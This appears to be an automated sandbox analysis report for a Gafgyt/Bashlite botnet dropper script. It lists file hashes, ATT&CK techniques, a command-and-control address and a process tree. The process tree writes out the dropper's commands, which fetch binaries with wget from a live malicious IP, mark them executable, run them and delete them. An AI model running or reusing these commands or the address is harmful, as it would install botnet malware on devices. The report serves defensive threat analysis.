gafgyt | 13812257a0e69ebd845f474473a63f956293186d5ec5ee9cc7564369b2fcf2b8

Analysis

max time kernel
134s
max time network
147s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
11-11-2024 14:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

1KB
MD5

d588d0b22dad3b7798f9b2bf95da8cef
SHA1

014c3611137341068b4ca0bcceb877292951c8f4
SHA256

13812257a0e69ebd845f474473a63f956293186d5ec5ee9cc7564369b2fcf2b8
SHA512

f75477828c57c12b1e934366e1e70e314da13330087e8279412d22f8a6215d4d2b24c34d94ee028403987db6d9b5f57c249c445a44f046861aeecb91bedd21f5

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

93.123.85.201:23

Signatures

Detected Gafgyt variant 12 IoCs

Processes:

resource	yara_rule
behavioral2/files/fstream-1.dat	family_gafgyt
behavioral2/files/fstream-2.dat	family_gafgyt
behavioral2/files/fstream-3.dat	family_gafgyt
behavioral2/files/fstream-4.dat	family_gafgyt
behavioral2/files/fstream-5.dat	family_gafgyt
behavioral2/files/fstream-6.dat	family_gafgyt
behavioral2/files/fstream-7.dat	family_gafgyt
behavioral2/files/fstream-8.dat	family_gafgyt
behavioral2/files/fstream-9.dat	family_gafgyt
behavioral2/files/fstream-10.dat	family_gafgyt
behavioral2/files/fstream-11.dat	family_gafgyt
behavioral2/files/fstream-12.dat	family_gafgyt

Gafgyt family
gafgyt
Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	Process
694	chmod
718	chmod
732	chmod
763	chmod
777	chmod
808	chmod
678	chmod
688	chmod
705	chmod
747	chmod
770	chmod
793	chmod
821	chmod

Executes dropped EXE 12 IoCs

Processes:

ntpdsshdopensshbashtftpwgetcronftppftpsh[cpu]apache2

ioc	pid	Process
/tmp/ntpd	679	ntpd
/tmp/sshd	689	sshd
/tmp/openssh	695	openssh
/tmp/bash	706	bash
/tmp/tftp	720	tftp
/tmp/wget	734	wget
/tmp/cron	748	cron
/tmp/ftp	764	ftp
/tmp/pftp	771	pftp
/tmp/sh	778	sh
/tmp/[cpu]	794	[cpu]
/tmp/apache2	810	apache2

Reads system routing table 1 TTPs 3 IoCs

Gets active network interfaces from /proc virtual filesystem.

discovery

Internet Connection Discovery

T1016.001

Processes:

tftp[cpu]apache2

description	ioc	Process
File opened for reading	/proc/net/route	tftp
File opened for reading	/proc/net/route	[cpu]
File opened for reading	/proc/net/route	apache2

Changes its process name 3 IoCs

Processes:

tftp[cpu]apache2

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	720	tftp
Changes the process name, possibly in an attempt to hide itself	794	[cpu]
Changes the process name, possibly in an attempt to hide itself	810	apache2

Reads system network configuration 1 TTPs 3 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

Processes:

tftp[cpu]apache2

description	ioc	Process
File opened for reading	/proc/net/route	tftp
File opened for reading	/proc/net/route	[cpu]
File opened for reading	/proc/net/route	apache2

Writes file to tmp directory 12 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwget

description	ioc	Process
File opened for modification	/tmp/sshd	wget
File opened for modification	/tmp/cron	wget
File opened for modification	/tmp/sh	wget
File opened for modification	/tmp/apache2	wget
File opened for modification	/tmp/ftp	wget
File opened for modification	/tmp/pftp	wget
File opened for modification	/tmp/[cpu]	wget
File opened for modification	/tmp/ntpd	wget
File opened for modification	/tmp/openssh	wget
File opened for modification	/tmp/bash	wget
File opened for modification	/tmp/tftp	wget
File opened for modification	/tmp/wget	wget

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:654
- /usr/bin/wget
  wget http://93.123.85.201/ntpd
  2⤵
  - Writes file to tmp directory
  PID:656
- /bin/chmod
  chmod +x ntpd
  2⤵
  - File and Directory Permissions Modification
  PID:678
- /tmp/ntpd
  ./ntpd
  2⤵
  - Executes dropped EXE
  PID:679
- /bin/rm
  rm -rf ntpd
  2⤵
  PID:682
- /usr/bin/wget
  wget http://93.123.85.201/sshd
  2⤵
  - Writes file to tmp directory
  PID:683
- /bin/chmod
  chmod +x sshd
  2⤵
  - File and Directory Permissions Modification
  PID:688
- /tmp/sshd
  ./sshd
  2⤵
  - Executes dropped EXE
  PID:689
- /bin/rm
  rm -rf sshd
  2⤵
  PID:692
- /usr/bin/wget
  wget http://93.123.85.201/openssh
  2⤵
  - Writes file to tmp directory
  PID:693
- /bin/chmod
  chmod +x openssh
  2⤵
  - File and Directory Permissions Modification
  PID:694
- /tmp/openssh
  ./openssh
  2⤵
  - Executes dropped EXE
  PID:695
- /bin/rm
  rm -rf openssh
  2⤵
  PID:697
- /usr/bin/wget
  wget http://93.123.85.201/bash
  2⤵
  - Writes file to tmp directory
  PID:698
- /bin/chmod
  chmod +x bash
  2⤵
  - File and Directory Permissions Modification
  PID:705
- /tmp/bash
  ./bash
  2⤵
  - Executes dropped EXE
  PID:706
- /bin/rm
  rm -rf bash
  2⤵
  PID:708
- /usr/bin/wget
  wget http://93.123.85.201/tftp
  2⤵
  - Writes file to tmp directory
  PID:710
- /bin/chmod
  chmod +x tftp
  2⤵
  - File and Directory Permissions Modification
  PID:718
- /tmp/tftp
  ./tftp
  2⤵
  - Executes dropped EXE
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:720
- /bin/rm
  rm -rf tftp
  2⤵
  PID:723
- /usr/bin/wget
  wget http://93.123.85.201/wget
  2⤵
  - Writes file to tmp directory
  PID:724
- /bin/chmod
  chmod +x wget
  2⤵
  - File and Directory Permissions Modification
  PID:732
- /tmp/wget
  ./wget
  2⤵
  - Executes dropped EXE
  PID:734
- /bin/rm
  rm -rf wget
  2⤵
  PID:736
- /usr/bin/wget
  wget http://93.123.85.201/cron
  2⤵
  - Writes file to tmp directory
  PID:738
- /bin/chmod
  chmod +x cron
  2⤵
  - File and Directory Permissions Modification
  PID:747
- /tmp/cron
  ./cron
  2⤵
  - Executes dropped EXE
  PID:748
- /bin/rm
  rm -rf cron
  2⤵
  PID:750
- /usr/bin/wget
  wget http://93.123.85.201/ftp
  2⤵
  - Writes file to tmp directory
  PID:752
- /bin/chmod
  chmod +x ftp
  2⤵
  - File and Directory Permissions Modification
  PID:763
- /tmp/ftp
  ./ftp
  2⤵
  - Executes dropped EXE
  PID:764
- /bin/rm
  rm -rf ftp
  2⤵
  PID:767
- /usr/bin/wget
  wget http://93.123.85.201/pftp
  2⤵
  - Writes file to tmp directory
  PID:768
- /bin/chmod
  chmod +x pftp
  2⤵
  - File and Directory Permissions Modification
  PID:770
- /tmp/pftp
  ./pftp
  2⤵
  - Executes dropped EXE
  PID:771
- /bin/rm
  rm -rf pftp
  2⤵
  PID:773
- /usr/bin/wget
  wget http://93.123.85.201/sh
  2⤵
  - Writes file to tmp directory
  PID:774
- /bin/chmod
  chmod +x sh
  2⤵
  - File and Directory Permissions Modification
  PID:777
- /tmp/sh
  ./sh
  2⤵
  - Executes dropped EXE
  PID:778
- /bin/rm
  rm -rf sh
  2⤵
  PID:781
- /usr/bin/wget
  wget "http://93.123.85.201/[cpu]"
  2⤵
  - Writes file to tmp directory
  PID:783
- /bin/chmod
  chmod +x "[cpu]"
  2⤵
  - File and Directory Permissions Modification
  PID:793
- /tmp/[cpu]
  "./[cpu]"
  2⤵
  - Executes dropped EXE
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:794
- /bin/rm
  rm -rf "[cpu]"
  2⤵
  PID:797
- /usr/bin/wget
  wget http://93.123.85.201/apache2
  2⤵
  - Writes file to tmp directory
  PID:799
- /bin/chmod
  chmod +x apache2
  2⤵
  - File and Directory Permissions Modification
  PID:808
- /tmp/apache2
  ./apache2
  2⤵
  - Executes dropped EXE
  - Reads system routing table
  - Changes its process name
  - Reads system network configuration
  PID:810
- /bin/rm
  rm -rf apache2
  2⤵
  PID:813
- /usr/bin/wget
  wget http://93.123.85.201/telnetd
  2⤵
  PID:815
- /bin/chmod
  chmod +x telnetd
  2⤵
  - File and Directory Permissions Modification
  PID:821
- /tmp/telnetd
  ./telnetd
  2⤵
  PID:822
- /bin/rm
  rm -rf telnetd
  2⤵
  PID:823

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/[cpu]

Filesize
147KB

MD5
72aea001ce758bae3b7adc93a557bc5d

SHA1
6e92747f4ec45aec5650d34ed7b1d4899a21be1a

SHA256
721ed0b47f6c546806173a0abab1e867ad2a953201da1d1a1d9cd19c0bfcba0f

SHA512
49e95cf8d77a6905ea3989a829b1b6a556d40d0f83b6a40e7cf5fb184fcafc1c13c763736d8ffcb750657f87979389a84f88daa7fd37f48078145dc161cb89e9

Download Submit
/tmp/apache2

Filesize
143KB

MD5
3d5b895c49817db7dfad1574226dcc31

SHA1
a86f02c6ffd51a5ec540a80d51358012ce0d1fde

SHA256
0ed7c92c832c1a9ac93891b4199a6dd8dc8f73edb60c75759349ff1d362e02b6

SHA512
c1ceffda5d67393f31ebe9d330b2fd6811b20a36b1c8d7bac6a9bb4e338ccd8e3b10a122c08226ef1e6318e899bb1f402f8aad63d9b2bad28672c044b67d4c24

Download Submit
/tmp/bash

Filesize
140KB

MD5
f33885bc2951d654477cb4f4d5f1c36f

SHA1
6ee7b0cd26df6ed278a52d73ae584232d230f72a

SHA256
93c83f99138f321d5fd8ab5f5818cadaa0b344aa444b0dddc8431898c0e48b15

SHA512
257fc1b0e2765b0962b325cd7ef7600066b10df0ab18017bb7c7f991503fcae6a72582d7dabab9ccc0c2c814e0efdbb62070283f0cc20ff884db469ca1c20a41

Download Submit
/tmp/cron

Filesize
134KB

MD5
07296b4d83d36917153f86d02870f998

SHA1
157d139716af9ce6d840659bd888be42b4b9f8f5

SHA256
2584273f6b8de024c6d3b55f784d068ea47e7ba5012e7b7de61ccfbaef17773c

SHA512
8b697bf849fab0d2987c52e4e99470701d3ddc245e7a6f9c1adbf472b60ab852f85443d4d8f105b54b74c163012ecf5221a3d7777a9a2b6f2fbdf7f7609fedf8

Download Submit
/tmp/ftp

Filesize
122KB

MD5
8bdb60f13472482a8a5450a81f8eb3b7

SHA1
54bca8986f8624cf2dfdbb1161bfc9f4de5ca1b1

SHA256
c55c6595480a937f378325b8111dac31876628c4d0ac8916dadec49c614b07b5

SHA512
a0aa1a7db1f9c900fa165f8ae7121d98c1678f701874fefa546dba3c912b3ddab25c9d2053fd0ad7d4452cc579fdeacfec39616fdef974751316fb910163540c

Download Submit
/tmp/ntpd

Filesize
170KB

MD5
a2d9767a5c6e98a274d7e555d7e67199

SHA1
4364a2a706db5f716a22459d9416f16a3a2889c6

SHA256
6a80f1ea14cf485a82fda55ee5a0195d99c6231f347d3aacb768377c74aff307

SHA512
ee406ecd6eb9d6ef8b67b33c94808456d4dabec4ecb6bedb3dffd8fcd1599a15996f0c4e54796fc1ac1b64c3cd8ce6f39cb0f97bbf4cdab3d31557a7b832774b

Download Submit
/tmp/openssh

Filesize
130KB

MD5
b3a7c495d0cd76dffdc18c2aa4dc1175

SHA1
cdec80ba321f75fc6dded020913ce21453acd85a

SHA256
31e67444d9ba8615c570bd4effff1801e4fd9c0f3431da069b0b730dbc60d58c

SHA512
1fdf38e8c92bb21c236588a01e3b0ce0e485381e1c392356b57ba46e4c9dbd609b9422a9dd2d44e5dfb7ff1f17dd5dc20c9fe02f890d2584e9e07a69df5845c6

Download Submit
/tmp/pftp

Filesize
137KB

MD5
9992d85d1f20c7ba2a3af31f33d47382

SHA1
daab1858efab60c8d5b2bbc8bc3ae8f7d3598c56

SHA256
948cd4d1e32391c60b00c14021d6a58450ccd15842b0d004f97bdb1a2cac8e18

SHA512
28dea01f6b8772fbfa9ba8ac70f8516c5eb00c9dd31c8983fe04a9c4ae878b484acc149a4e68167f7b08291bcb81d5194d0eb60287b0bda35c71a62b4bb15a72

Download Submit
/tmp/sh

Filesize
148KB

MD5
09e9ecd0d275ab121188710cef1741eb

SHA1
a13cf836836490b3cf579da88bfac83c47c66ce7

SHA256
fdb89dba5487dfcd6b84ae9afe612283b5ac0260aba2caca9db38dd4390403df

SHA512
492e316b053bc66e82291a84ddc75aad9fc3274f05120abbc644f6f08f3af2fe95ed6bda9c055d04c7f213a4ed657481a9ed34d9252bcfff32187860d63f5ba4

Download Submit
/tmp/sshd

Filesize
170KB

MD5
fd39dae5a09f57762f4019672e3fd3fb

SHA1
5ef0451c1edf6fd8257b254289bf8a5d74fe19c7

SHA256
d485508087f98610ad07803257ca0e84a3994c3af1ca841d919bc7782c6cca70

SHA512
0c0385a9e9fa58e1702a0428e3b58eea9135d625bdc745453f46fb836b00e173cdeaa2e47bc212b35fc99e2b576885e1c37ae1cd2eb15a0cf63fcd2b8be6af82

Download Submit
/tmp/tftp

Filesize
160KB

MD5
2a45d315342063a6ca92c63f5f77287a

SHA1
94dbc030cbb625fea324b1dd9838e3ba926bb5a3

SHA256
7aebc6a86fda69a4889e18ff8d7d1b6b0bd227070793298450c9ec107f66fb41

SHA512
ed6e8126a68212aa2c39a7696c4c508808c53e98ca88978b89c59c375c1af44d084ce6937406da6c358ecd96f17034d09bc8b637e7268330ba2643f29ff5f93f

Download Submit
/tmp/wget

Filesize
122KB

MD5
2929269020e09c372861ea718c97781e

SHA1
9850ee12342a57c760957892609c6c42f3acf3ed

SHA256
19d01e944b91478df283f68b18f87c0a2366db50a60c861083ea24e05db698df

SHA512
1a667987a534ce682a80ff456ae0adf2418418eed323c974d2021dffce8df51942af1037f1780056fb6b332929934046f0b3953ae0585b914796bc611bb31bf4

Download Submit